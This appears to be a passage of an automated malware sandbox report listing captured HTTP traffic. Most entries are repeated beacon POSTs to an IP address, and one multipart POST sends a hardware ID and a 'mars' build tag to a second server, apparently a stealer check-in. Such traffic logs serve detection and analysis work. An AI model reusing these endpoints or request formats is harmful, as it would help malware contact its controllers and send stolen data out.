Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDAEHJJECAEGCAAAAEGIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 33 42 36 31 44 43 42 31 33 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 45 48 4a 4a 45 43 41 45 47 43 41 41 41 41 45 47 49 2d 2d 0d 0a Data Ascii: ------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="hwid"E3B61DCB13684217651120------JDAEHJJECAEGCAAAAEGIContent-Disposition: form-data; name="build"mars------JDAEHJJECAEGCAAAAEGI--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 45 37 33 42 38 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32E73B85082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
